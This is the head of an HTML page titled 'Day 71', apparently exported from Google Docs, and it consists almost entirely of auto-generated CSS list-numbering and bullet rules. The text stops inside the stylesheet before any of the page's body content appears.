<html>

<head>
	<meta content="text/html; charset=UTF-8" http-equiv="content-type">
	<title>Day 71</title>
	<style type="text/css">
		@import url('https://themes.googleusercontent.com/fonts/css?kit=-lTUqgJg2dxbe4D7B5DEID164ctO4cAXGRkC_ZwBWlzm74GqoUREvGx3nvtIBwYUN4duVc9C58uwPiY8_59Fz51Zsjtnjtw1i9vMMjzZT74');

		.lst-kix_t8twi5tix7m3-4>li {
			counter-increment: lst-ctn-kix_t8twi5tix7m3-4
		}

		.lst-kix_q172a0nf55p3-7>li {
			counter-increment: lst-ctn-kix_q172a0nf55p3-7
		}

		.lst-kix_5bbn6o1fums7-0>li {
			counter-increment: lst-ctn-kix_5bbn6o1fums7-0
		}

		ol.lst-kix_fi2xbrv6fzbg-2.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-2 0
		}

		.lst-kix_5bbn6o1fums7-8>li:before {
			content: ""counter(lst-ctn-kix_5bbn6o1fums7-8, lower-roman) ". "
		}

		.lst-kix_5bbn6o1fums7-5>li:before {
			content: ""counter(lst-ctn-kix_5bbn6o1fums7-5, lower-roman) ". "
		}

		.lst-kix_n6wv8d8mqg4j-2>li {
			counter-increment: lst-ctn-kix_n6wv8d8mqg4j-2
		}

		.lst-kix_5bbn6o1fums7-6>li:before {
			content: ""counter(lst-ctn-kix_5bbn6o1fums7-6, decimal) ". "
		}

		.lst-kix_2yzjaagjqxah-8>li:before {
			content: "\0025a0  "
		}

		ol.lst-kix_q172a0nf55p3-5.start {
			counter-reset: lst-ctn-kix_q172a0nf55p3-5 0
		}

		ol.lst-kix_pj27egx948rq-1.start {
			counter-reset: lst-ctn-kix_pj27egx948rq-1 0
		}

		.lst-kix_5bbn6o1fums7-7>li:before {
			content: ""counter(lst-ctn-kix_5bbn6o1fums7-7, lower-latin) ". "
		}

		ol.lst-kix_avc0gcoxesrz-1.start {
			counter-reset: lst-ctn-kix_avc0gcoxesrz-1 0
		}

		ol.lst-kix_n6wv8d8mqg4j-4.start {
			counter-reset: lst-ctn-kix_n6wv8d8mqg4j-4 0
		}

		.lst-kix_5lp3gqbxm2h8-1>li:before {
			content: "\0025cb  "
		}

		ul.lst-kix_c8glqpz4x2ma-8 {
			list-style-type: none
		}

		.lst-kix_5lp3gqbxm2h8-2>li:before {
			content: "\0025a0  "
		}

		.lst-kix_n6wv8d8mqg4j-4>li {
			counter-increment: lst-ctn-kix_n6wv8d8mqg4j-4
		}

		.lst-kix_5lp3gqbxm2h8-3>li:before {
			content: "\0025cf  "
		}

		ul.lst-kix_c8glqpz4x2ma-3 {
			list-style-type: none
		}

		ul.lst-kix_c8glqpz4x2ma-2 {
			list-style-type: none
		}

		ul.lst-kix_c8glqpz4x2ma-1 {
			list-style-type: none
		}

		.lst-kix_t8twi5tix7m3-2>li {
			counter-increment: lst-ctn-kix_t8twi5tix7m3-2
		}

		ul.lst-kix_c8glqpz4x2ma-0 {
			list-style-type: none
		}

		.lst-kix_5lp3gqbxm2h8-4>li:before {
			content: "\0025cb  "
		}

		.lst-kix_5lp3gqbxm2h8-6>li:before {
			content: "\0025cf  "
		}

		ol.lst-kix_5bbn6o1fums7-3 {
			list-style-type: none
		}

		ul.lst-kix_c8glqpz4x2ma-7 {
			list-style-type: none
		}

		ol.lst-kix_5bbn6o1fums7-2 {
			list-style-type: none
		}

		ul.lst-kix_c8glqpz4x2ma-6 {
			list-style-type: none
		}

		ol.lst-kix_avc0gcoxesrz-7.start {
			counter-reset: lst-ctn-kix_avc0gcoxesrz-7 0
		}

		ol.lst-kix_5bbn6o1fums7-1 {
			list-style-type: none
		}

		ul.lst-kix_c8glqpz4x2ma-5 {
			list-style-type: none
		}

		ol.lst-kix_5bbn6o1fums7-0 {
			list-style-type: none
		}

		ol.lst-kix_5bbn6o1fums7-2.start {
			counter-reset: lst-ctn-kix_5bbn6o1fums7-2 0
		}

		ul.lst-kix_c8glqpz4x2ma-4 {
			list-style-type: none
		}

		.lst-kix_5lp3gqbxm2h8-5>li:before {
			content: "\0025a0  "
		}

		.lst-kix_5lp3gqbxm2h8-8>li:before {
			content: "\0025a0  "
		}

		.lst-kix_pj27egx948rq-1>li {
			counter-increment: lst-ctn-kix_pj27egx948rq-1
		}

		.lst-kix_fi2xbrv6fzbg-7>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-7
		}

		ol.lst-kix_pj27egx948rq-7.start {
			counter-reset: lst-ctn-kix_pj27egx948rq-7 0
		}

		.lst-kix_5lp3gqbxm2h8-7>li:before {
			content: "\0025cb  "
		}

		ol.lst-kix_5bbn6o1fums7-8.start {
			counter-reset: lst-ctn-kix_5bbn6o1fums7-8 0
		}

		.lst-kix_avc0gcoxesrz-6>li {
			counter-increment: lst-ctn-kix_avc0gcoxesrz-6
		}

		.lst-kix_t8twi5tix7m3-3>li:before {
			content: ""counter(lst-ctn-kix_t8twi5tix7m3-3, decimal) ". "
		}

		.lst-kix_kjisakvjzjsi-0>li:before {
			content: "\0025cf  "
		}

		.lst-kix_t8twi5tix7m3-4>li:before {
			content: ""counter(lst-ctn-kix_t8twi5tix7m3-4, lower-latin) ". "
		}

		.lst-kix_i6qpwdhuifir-8>li:before {
			content: "\0025a0  "
		}

		.lst-kix_fi2xbrv6fzbg-3>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-3
		}

		.lst-kix_t8twi5tix7m3-6>li:before {
			content: ""counter(lst-ctn-kix_t8twi5tix7m3-6, decimal) ". "
		}

		.lst-kix_kjisakvjzjsi-3>li:before {
			content: "\0025cf  "
		}

		.lst-kix_t8twi5tix7m3-5>li:before {
			content: ""counter(lst-ctn-kix_t8twi5tix7m3-5, lower-roman) ". "
		}

		.lst-kix_t8twi5tix7m3-7>li:before {
			content: ""counter(lst-ctn-kix_t8twi5tix7m3-7, lower-latin) ". "
		}

		.lst-kix_kjisakvjzjsi-4>li:before {
			content: "\0025cb  "
		}

		.lst-kix_kjisakvjzjsi-5>li:before {
			content: "\0025a0  "
		}

		.lst-kix_i6qpwdhuifir-3>li:before {
			content: "\0025cf  "
		}

		ol.lst-kix_5bbn6o1fums7-7 {
			list-style-type: none
		}

		ol.lst-kix_pj27egx948rq-7 {
			list-style-type: none
		}

		.lst-kix_kjisakvjzjsi-7>li:before {
			content: "\0025cb  "
		}

		ol.lst-kix_5bbn6o1fums7-6 {
			list-style-type: none
		}

		.lst-kix_i6qpwdhuifir-2>li:before {
			content: "\0025a0  "
		}

		ol.lst-kix_pj27egx948rq-6 {
			list-style-type: none
		}

		ol.lst-kix_5bbn6o1fums7-5 {
			list-style-type: none
		}

		.lst-kix_kjisakvjzjsi-6>li:before {
			content: "\0025cf  "
		}

		.lst-kix_kjisakvjzjsi-8>li:before {
			content: "\0025a0  "
		}

		ol.lst-kix_5bbn6o1fums7-4 {
			list-style-type: none
		}

		ol.lst-kix_pj27egx948rq-8 {
			list-style-type: none
		}

		.lst-kix_i6qpwdhuifir-0>li:before {
			content: "\0025cf  "
		}

		.lst-kix_t8twi5tix7m3-8>li:before {
			content: ""counter(lst-ctn-kix_t8twi5tix7m3-8, lower-roman) ". "
		}

		ol.lst-kix_pj27egx948rq-3 {
			list-style-type: none
		}

		.lst-kix_t8twi5tix7m3-6>li {
			counter-increment: lst-ctn-kix_t8twi5tix7m3-6
		}

		ol.lst-kix_pj27egx948rq-2 {
			list-style-type: none
		}

		.lst-kix_i6qpwdhuifir-1>li:before {
			content: "\0025cb  "
		}

		ol.lst-kix_pj27egx948rq-5 {
			list-style-type: none
		}

		ol.lst-kix_5bbn6o1fums7-8 {
			list-style-type: none
		}

		ol.lst-kix_pj27egx948rq-4 {
			list-style-type: none
		}

		.lst-kix_t8twi5tix7m3-0>li {
			counter-increment: lst-ctn-kix_t8twi5tix7m3-0
		}

		.lst-kix_5bbn6o1fums7-7>li {
			counter-increment: lst-ctn-kix_5bbn6o1fums7-7
		}

		.lst-kix_5bbn6o1fums7-1>li:before {
			content: ""counter(lst-ctn-kix_5bbn6o1fums7-1, lower-latin) ". "
		}

		.lst-kix_avc0gcoxesrz-8>li {
			counter-increment: lst-ctn-kix_avc0gcoxesrz-8
		}

		.lst-kix_pj27egx948rq-3>li {
			counter-increment: lst-ctn-kix_pj27egx948rq-3
		}

		.lst-kix_5bbn6o1fums7-2>li:before {
			content: ""counter(lst-ctn-kix_5bbn6o1fums7-2, lower-roman) ". "
		}

		.lst-kix_5bbn6o1fums7-0>li:before {
			content: ""counter(lst-ctn-kix_5bbn6o1fums7-0, decimal) ". "
		}

		.lst-kix_q172a0nf55p3-0>li {
			counter-increment: lst-ctn-kix_q172a0nf55p3-0
		}

		.lst-kix_5lp3gqbxm2h8-0>li:before {
			content: "\0025cf  "
		}

		.lst-kix_q172a0nf55p3-3>li {
			counter-increment: lst-ctn-kix_q172a0nf55p3-3
		}

		.lst-kix_5bbn6o1fums7-4>li:before {
			content: ""counter(lst-ctn-kix_5bbn6o1fums7-4, lower-latin) ". "
		}

		ul.lst-kix_i6qpwdhuifir-0 {
			list-style-type: none
		}

		.lst-kix_5bbn6o1fums7-3>li:before {
			content: ""counter(lst-ctn-kix_5bbn6o1fums7-3, decimal) ". "
		}

		ul.lst-kix_i6qpwdhuifir-2 {
			list-style-type: none
		}

		ul.lst-kix_i6qpwdhuifir-1 {
			list-style-type: none
		}

		.lst-kix_avc0gcoxesrz-2>li {
			counter-increment: lst-ctn-kix_avc0gcoxesrz-2
		}

		ul.lst-kix_i6qpwdhuifir-4 {
			list-style-type: none
		}

		ul.lst-kix_i6qpwdhuifir-3 {
			list-style-type: none
		}

		ol.lst-kix_5bbn6o1fums7-3.start {
			counter-reset: lst-ctn-kix_5bbn6o1fums7-3 0
		}

		ul.lst-kix_i6qpwdhuifir-6 {
			list-style-type: none
		}

		ol.lst-kix_q172a0nf55p3-4.start {
			counter-reset: lst-ctn-kix_q172a0nf55p3-4 0
		}

		ol.lst-kix_avc0gcoxesrz-8.start {
			counter-reset: lst-ctn-kix_avc0gcoxesrz-8 0
		}

		ul.lst-kix_i6qpwdhuifir-5 {
			list-style-type: none
		}

		ol.lst-kix_avc0gcoxesrz-2.start {
			counter-reset: lst-ctn-kix_avc0gcoxesrz-2 0
		}

		ul.lst-kix_i6qpwdhuifir-8 {
			list-style-type: none
		}

		ul.lst-kix_i6qpwdhuifir-7 {
			list-style-type: none
		}

		.lst-kix_i6qpwdhuifir-4>li:before {
			content: "\0025cb  "
		}

		.lst-kix_i6qpwdhuifir-5>li:before {
			content: "\0025a0  "
		}

		.lst-kix_i6qpwdhuifir-6>li:before {
			content: "\0025cf  "
		}

		ol.lst-kix_n6wv8d8mqg4j-5.start {
			counter-reset: lst-ctn-kix_n6wv8d8mqg4j-5 0
		}

		ol.lst-kix_pj27egx948rq-2.start {
			counter-reset: lst-ctn-kix_pj27egx948rq-2 0
		}

		.lst-kix_kjisakvjzjsi-2>li:before {
			content: "\0025a0  "
		}

		.lst-kix_kjisakvjzjsi-1>li:before {
			content: "\0025cb  "
		}

		.lst-kix_i6qpwdhuifir-7>li:before {
			content: "\0025cb  "
		}

		ol.lst-kix_5bbn6o1fums7-6.start {
			counter-reset: lst-ctn-kix_5bbn6o1fums7-6 0
		}

		ul.lst-kix_2yzjaagjqxah-0 {
			list-style-type: none
		}

		.lst-kix_lh5aqr9xz8oa-2>li:before {
			content: "\0025a0  "
		}

		ul.lst-kix_kjisakvjzjsi-8 {
			list-style-type: none
		}

		.lst-kix_fi2xbrv6fzbg-0>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-0
		}

		ul.lst-kix_kjisakvjzjsi-5 {
			list-style-type: none
		}

		.lst-kix_n6wv8d8mqg4j-8>li {
			counter-increment: lst-ctn-kix_n6wv8d8mqg4j-8
		}

		ul.lst-kix_kjisakvjzjsi-4 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-7 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-6 {
			list-style-type: none
		}

		ol.lst-kix_n6wv8d8mqg4j-5 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-7 {
			list-style-type: none
		}

		ol.lst-kix_n6wv8d8mqg4j-6 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-8 {
			list-style-type: none
		}

		ol.lst-kix_n6wv8d8mqg4j-3 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-5 {
			list-style-type: none
		}

		ol.lst-kix_n6wv8d8mqg4j-4 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-6 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-3 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-4 {
			list-style-type: none
		}

		.lst-kix_lh5aqr9xz8oa-0>li:before {
			content: "  "
		}

		.lst-kix_lh5aqr9xz8oa-8>li:before {
			content: "\0025a0  "
		}

		ol.lst-kix_n6wv8d8mqg4j-7 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-1 {
			list-style-type: none
		}

		ol.lst-kix_pj27egx948rq-8.start {
			counter-reset: lst-ctn-kix_pj27egx948rq-8 0
		}

		ol.lst-kix_n6wv8d8mqg4j-8 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-2 {
			list-style-type: none
		}

		.lst-kix_n6wv8d8mqg4j-2>li:before {
			content: ""counter(lst-ctn-kix_n6wv8d8mqg4j-2, lower-roman) ". "
		}

		.lst-kix_q172a0nf55p3-2>li {
			counter-increment: lst-ctn-kix_q172a0nf55p3-2
		}

		.lst-kix_pj27egx948rq-5>li:before {
			content: ""counter(lst-ctn-kix_pj27egx948rq-5, lower-roman) ". "
		}

		.lst-kix_pj27egx948rq-7>li:before {
			content: ""counter(lst-ctn-kix_pj27egx948rq-7, lower-latin) ". "
		}

		ol.lst-kix_n6wv8d8mqg4j-1 {
			list-style-type: none
		}

		.lst-kix_n6wv8d8mqg4j-0>li:before {
			content: ""counter(lst-ctn-kix_n6wv8d8mqg4j-0, decimal) ". "
		}

		ol.lst-kix_n6wv8d8mqg4j-2 {
			list-style-type: none
		}

		.lst-kix_n6wv8d8mqg4j-4>li:before {
			content: ""counter(lst-ctn-kix_n6wv8d8mqg4j-4, lower-latin) ". "
		}

		ol.lst-kix_n6wv8d8mqg4j-0 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-1 {
			list-style-type: none
		}

		.lst-kix_avc0gcoxesrz-1>li {
			counter-increment: lst-ctn-kix_avc0gcoxesrz-1
		}

		.lst-kix_lh5aqr9xz8oa-6>li:before {
			content: "\0025cf  "
		}

		ul.lst-kix_kjisakvjzjsi-0 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-3 {
			list-style-type: none
		}

		.lst-kix_pj27egx948rq-3>li:before {
			content: ""counter(lst-ctn-kix_pj27egx948rq-3, decimal) ". "
		}

		ul.lst-kix_kjisakvjzjsi-2 {
			list-style-type: none
		}

		.lst-kix_lh5aqr9xz8oa-4>li:before {
			content: "\0025cb  "
		}

		ol.lst-kix_fi2xbrv6fzbg-6.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-6 0
		}

		.lst-kix_avc0gcoxesrz-5>li:before {
			content: ""counter(lst-ctn-kix_avc0gcoxesrz-5, lower-roman) ". "
		}

		.lst-kix_avc0gcoxesrz-7>li:before {
			content: ""counter(lst-ctn-kix_avc0gcoxesrz-7, lower-latin) ". "
		}

		.lst-kix_n6wv8d8mqg4j-8>li:before {
			content: ""counter(lst-ctn-kix_n6wv8d8mqg4j-8, lower-roman) ". "
		}

		.lst-kix_n6wv8d8mqg4j-6>li:before {
			content: ""counter(lst-ctn-kix_n6wv8d8mqg4j-6, decimal) ". "
		}

		ol.lst-kix_pj27egx948rq-1 {
			list-style-type: none
		}

		.lst-kix_avc0gcoxesrz-1>li:before {
			content: ""counter(lst-ctn-kix_avc0gcoxesrz-1, lower-latin) ". "
		}

		ol.lst-kix_pj27egx948rq-0 {
			list-style-type: none
		}

		ol.lst-kix_avc0gcoxesrz-3.start {
			counter-reset: lst-ctn-kix_avc0gcoxesrz-3 0
		}

		.lst-kix_avc0gcoxesrz-0>li {
			counter-increment: lst-ctn-kix_avc0gcoxesrz-0
		}

		ol.lst-kix_t8twi5tix7m3-1 {
			list-style-type: none
		}

		ol.lst-kix_t8twi5tix7m3-0 {
			list-style-type: none
		}

		ol.lst-kix_n6wv8d8mqg4j-3.start {
			counter-reset: lst-ctn-kix_n6wv8d8mqg4j-3 0
		}

		ol.lst-kix_t8twi5tix7m3-7 {
			list-style-type: none
		}

		ol.lst-kix_t8twi5tix7m3-6 {
			list-style-type: none
		}

		.lst-kix_t8twi5tix7m3-8>li {
			counter-increment: lst-ctn-kix_t8twi5tix7m3-8
		}

		ol.lst-kix_t8twi5tix7m3-8.start {
			counter-reset: lst-ctn-kix_t8twi5tix7m3-8 0
		}

		.lst-kix_avc0gcoxesrz-3>li:before {
			content: ""counter(lst-ctn-kix_avc0gcoxesrz-3, decimal) ". "
		}

		ol.lst-kix_t8twi5tix7m3-8 {
			list-style-type: none
		}

		ol.lst-kix_t8twi5tix7m3-3 {
			list-style-type: none
		}

		ol.lst-kix_t8twi5tix7m3-2 {
			list-style-type: none
		}

		ol.lst-kix_n6wv8d8mqg4j-0.start {
			counter-reset: lst-ctn-kix_n6wv8d8mqg4j-0 0
		}

		ol.lst-kix_t8twi5tix7m3-5 {
			list-style-type: none
		}

		ol.lst-kix_t8twi5tix7m3-4 {
			list-style-type: none
		}

		.lst-kix_q172a0nf55p3-1>li {
			counter-increment: lst-ctn-kix_q172a0nf55p3-1
		}

		.lst-kix_c8glqpz4x2ma-7>li:before {
			content: "-  "
		}

		.lst-kix_t8twi5tix7m3-1>li {
			counter-increment: lst-ctn-kix_t8twi5tix7m3-1
		}

		.lst-kix_t8twi5tix7m3-1>li:before {
			content: ""counter(lst-ctn-kix_t8twi5tix7m3-1, lower-latin) ". "
		}

		.lst-kix_c8glqpz4x2ma-5>li:before {
			content: "-  "
		}

		ol.lst-kix_avc0gcoxesrz-6.start {
			counter-reset: lst-ctn-kix_avc0gcoxesrz-6 0
		}

		.lst-kix_pj27egx948rq-2>li {
			counter-increment: lst-ctn-kix_pj27egx948rq-2
		}

		.lst-kix_5bbn6o1fums7-8>li {
			counter-increment: lst-ctn-kix_5bbn6o1fums7-8
		}

		ol.lst-kix_fi2xbrv6fzbg-7.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-7 0
		}

		.lst-kix_t8twi5tix7m3-7>li {
			counter-increment: lst-ctn-kix_t8twi5tix7m3-7
		}

		ol.lst-kix_n6wv8d8mqg4j-2.start {
			counter-reset: lst-ctn-kix_n6wv8d8mqg4j-2 0
		}

		.lst-kix_c8glqpz4x2ma-1>li:before {
			content: "-  "
		}

		.lst-kix_c8glqpz4x2ma-3>li:before {
			content: "-  "
		}

		ol.lst-kix_q172a0nf55p3-0.start {
			counter-reset: lst-ctn-kix_q172a0nf55p3-0 0
		}

		ol.lst-kix_pj27egx948rq-6.start {
			counter-reset: lst-ctn-kix_pj27egx948rq-6 0
		}

		ol.lst-kix_q172a0nf55p3-1.start {
			counter-reset: lst-ctn-kix_q172a0nf55p3-1 0
		}

		ol.lst-kix_n6wv8d8mqg4j-1.start {
			counter-reset: lst-ctn-kix_n6wv8d8mqg4j-1 0
		}

		.lst-kix_2yzjaagjqxah-7>li:before {
			content: "\0025cb  "
		}

		.lst-kix_fi2xbrv6fzbg-5>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-5
		}

		ol.lst-kix_5bbn6o1fums7-7.start {
			counter-reset: lst-ctn-kix_5bbn6o1fums7-7 0
		}

		.lst-kix_2yzjaagjqxah-5>li:before {
			content: "\0025a0  "
		}

		.lst-kix_n6wv8d8mqg4j-3>li {
			counter-increment: lst-ctn-kix_n6wv8d8mqg4j-3
		}

		.lst-kix_q172a0nf55p3-8>li {
			counter-increment: lst-ctn-kix_q172a0nf55p3-8
		}

		.lst-kix_5bbn6o1fums7-2>li {
			counter-increment: lst-ctn-kix_5bbn6o1fums7-2
		}

		.lst-kix_pj27egx948rq-8>li {
			counter-increment: lst-ctn-kix_pj27egx948rq-8
		}

		ol.lst-kix_fi2xbrv6fzbg-8.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-8 0
		}

		ol.lst-kix_pj27egx948rq-5.start {
			counter-reset: lst-ctn-kix_pj27egx948rq-5 0
		}

		.lst-kix_2yzjaagjqxah-3>li:before {
			content: "\0025cf  "
		}

		.lst-kix_2yzjaagjqxah-1>li:before {
			content: "\0025cb  "
		}

		ol.lst-kix_avc0gcoxesrz-5.start {
			counter-reset: lst-ctn-kix_avc0gcoxesrz-5 0
		}

		.lst-kix_fi2xbrv6fzbg-6>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-6
		}

		ol.lst-kix_n6wv8d8mqg4j-7.start {
			counter-reset: lst-ctn-kix_n6wv8d8mqg4j-7 0
		}

		ol.lst-kix_avc0gcoxesrz-4.start {
			counter-reset: lst-ctn-kix_avc0gcoxesrz-4 0
		}

		.lst-kix_q172a0nf55p3-8>li:before {
			content: ""counter(lst-ctn-kix_q172a0nf55p3-8, lower-roman) ". "
		}

		.lst-kix_avc0gcoxesrz-7>li {
			counter-increment: lst-ctn-kix_avc0gcoxesrz-7
		}

		ol.lst-kix_q172a0nf55p3-2.start {
			counter-reset: lst-ctn-kix_q172a0nf55p3-2 0
		}

		.lst-kix_q172a0nf55p3-7>li:before {
			content: ""counter(lst-ctn-kix_q172a0nf55p3-7, lower-latin) ". "
		}

		.lst-kix_q172a0nf55p3-4>li:before {
			content: ""counter(lst-ctn-kix_q172a0nf55p3-4, lower-latin) ". "
		}

		.lst-kix_q172a0nf55p3-5>li:before {
			content: ""counter(lst-ctn-kix_q172a0nf55p3-5, lower-roman) ". "
		}

		.lst-kix_q172a0nf55p3-2>li:before {
			content: ""counter(lst-ctn-kix_q172a0nf55p3-2, lower-roman) ". "
		}

		.lst-kix_q172a0nf55p3-6>li:before {
			content: ""counter(lst-ctn-kix_q172a0nf55p3-6, decimal) ". "
		}

		ol.lst-kix_t8twi5tix7m3-1.start {
			counter-reset: lst-ctn-kix_t8twi5tix7m3-1 0
		}

		.lst-kix_q172a0nf55p3-6>li {
			counter-increment: lst-ctn-kix_q172a0nf55p3-6
		}

		.lst-kix_t8twi5tix7m3-3>li {
			counter-increment: lst-ctn-kix_t8twi5tix7m3-3
		}

		.lst-kix_q172a0nf55p3-3>li:before {
			content: ""counter(lst-ctn-kix_q172a0nf55p3-3, decimal) ". "
		}

		.lst-kix_fi2xbrv6fzbg-3>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-3, decimal) ". "
		}

		.lst-kix_n6wv8d8mqg4j-1>li {
			counter-increment: lst-ctn-kix_n6wv8d8mqg4j-1
		}

		ol.lst-kix_5bbn6o1fums7-5.start {
			counter-reset: lst-ctn-kix_5bbn6o1fums7-5 0
		}

		.lst-kix_fi2xbrv6fzbg-2>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-2, lower-roman) ". "
		}

		.lst-kix_fi2xbrv6fzbg-6>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-6, decimal) ". "
		}

		.lst-kix_5bbn6o1fums7-1>li {
			counter-increment: lst-ctn-kix_5bbn6o1fums7-1
		}

		ul.lst-kix_hkg89eyxvtvi-0 {
			list-style-type: none
		}

		.lst-kix_q172a0nf55p3-0>li:before {
			content: ""counter(lst-ctn-kix_q172a0nf55p3-0, decimal) ". "
		}

		.lst-kix_q172a0nf55p3-1>li:before {
			content: ""counter(lst-ctn-kix_q172a0nf55p3-1, lower-latin) ". "
		}

		.lst-kix_fi2xbrv6fzbg-5>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-5, lower-roman) ". "
		}

		ol.lst-kix_pj27egx948rq-4.start {
			counter-reset: lst-ctn-kix_pj27egx948rq-4 0
		}

		.lst-kix_fi2xbrv6fzbg-4>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-4, lower-latin) ". "
		}

		.lst-kix_fi2xbrv6fzbg-4>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-4
		}

		ul.lst-kix_hkg89eyxvtvi-1 {
			list-style-type: none
		}

		.lst-kix_fi2xbrv6fzbg-7>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-7, lower-latin) ". "
		}

		ul.lst-kix_hkg89eyxvtvi-2 {
			list-style-type: none
		}

		.lst-kix_t8twi5tix7m3-5>li {
			counter-increment: lst-ctn-kix_t8twi5tix7m3-5
		}

		ul.lst-kix_hkg89eyxvtvi-3 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-4 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-5 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-6 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-7 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-8 {
			list-style-type: none
		}

		.lst-kix_fi2xbrv6fzbg-8>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-8, lower-roman) ". "
		}

		ol.lst-kix_fi2xbrv6fzbg-0.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-0 0
		}

		ol.lst-kix_pj27egx948rq-3.start {
			counter-reset: lst-ctn-kix_pj27egx948rq-3 0
		}

		.lst-kix_pj27egx948rq-7>li {
			counter-increment: lst-ctn-kix_pj27egx948rq-7
		}

		.lst-kix_5bbn6o1fums7-3>li {
			counter-increment: lst-ctn-kix_5bbn6o1fums7-3
		}

		ol.lst-kix_t8twi5tix7m3-7.start {
			counter-reset: lst-ctn-kix_t8twi5tix7m3-7 0
		}

		ol.lst-kix_q172a0nf55p3-3.start {
			counter-reset: lst-ctn-kix_q172a0nf55p3-3 0
		}

		.lst-kix_n6wv8d8mqg4j-5>li {
			counter-increment: lst-ctn-kix_n6wv8d8mqg4j-5
		}

		ol.lst-kix_fi2xbrv6fzbg-4.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-4 0
		}

		.lst-kix_fi2xbrv6fzbg-1>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-1, lower-latin) ". "
		}

		ol.lst-kix_5bbn6o1fums7-4.start {
			counter-reset: lst-ctn-kix_5bbn6o1fums7-4 0
		}

		.lst-kix_hkg89eyxvtvi-0>li:before {
			content: "\0025cf  "
		}

		.lst-kix_fi2xbrv6fzbg-0>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-0, decimal) ". "
		}

		.lst-kix_hkg89eyxvtvi-1>li:before {
			content: "\0025cb  "
		}

		.lst-kix_avc0gcoxesrz-5>li {
			counter-increment: lst-ctn-kix_avc0gcoxesrz-5
		}

		.lst-kix_hkg89eyxvtvi-3>li:before {
			content: "\0025cf  "
		}

		ul.lst-kix_5lp3gqbxm2h8-1 {
			list-style-type: none
		}

		ul.lst-kix_5lp3gqbxm2h8-0 {
			list-style-type: none
		}

		.lst-kix_hkg89eyxvtvi-2>li:before {
			content: "\0025a0  "
		}

		.lst-kix_pj27egx948rq-0>li {
			counter-increment: lst-ctn-kix_pj27egx948rq-0
		}

		.lst-kix_hkg89eyxvtvi-5>li:before {
			content: "\0025a0  "
		}

		ol.lst-kix_t8twi5tix7m3-6.start {
			counter-reset: lst-ctn-kix_t8twi5tix7m3-6 0
		}

		.lst-kix_pj27egx948rq-1>li:before {
			content: ""counter(lst-ctn-kix_pj27egx948rq-1, lower-latin) ". "
		}

		.lst-kix_hkg89eyxvtvi-4>li:before {
			content: "\0025cb  "
		}

		.lst-kix_pj27egx948rq-0>li:before {
			content: ""counter(lst-ctn-kix_pj27egx948rq-0, decimal) ". "
		}

		.lst-kix_hkg89eyxvtvi-7>li:before {
			content: "\0025cb  "
		}

		.lst-kix_hkg89eyxvtvi-6>li:before {
			content: "\0025cf  "
		}

		ul.lst-kix_5lp3gqbxm2h8-5 {
			list-style-type: none
		}

		ul.lst-kix_5lp3gqbxm2h8-4 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-5.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-5 0
		}

		ul.lst-kix_5lp3gqbxm2h8-3 {
			list-style-type: none
		}

		ul.lst-kix_5lp3gqbxm2h8-2 {
			list-style-type: none
		}

		ol.lst-kix_t8twi5tix7m3-0.start {
			counter-reset: lst-ctn-kix_t8twi5tix7m3-0 0
		}

		ul.lst-kix_5lp3gqbxm2h8-8 {
			list-style-type: none
		}

		.lst-kix_hkg89eyxvtvi-8>li:before {
			content: "\0025a0  "
		}

		ul.lst-kix_5lp3gqbxm2h8-7 {
			list-style-type: none
		}

		ul.lst-kix_5lp3gqbxm2h8-6 {
			list-style-type: none
		}

		.lst-kix_lh5aqr9xz8oa-1>li:before {
			content: "\0025cb  "
		}

		.lst-kix_lh5aqr9xz8oa-3>li:before {
			content: "\0025cf  "
		}

		ol.lst-kix_fi2xbrv6fzbg-3 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-4 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-1 {
			list-style-type: none
		}

		.lst-kix_5bbn6o1fums7-6>li {
			counter-increment: lst-ctn-kix_5bbn6o1fums7-6
		}

		ol.lst-kix_fi2xbrv6fzbg-2 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-0 {
			list-style-type: none
		}

		.lst-kix_pj27egx948rq-8>li:before {
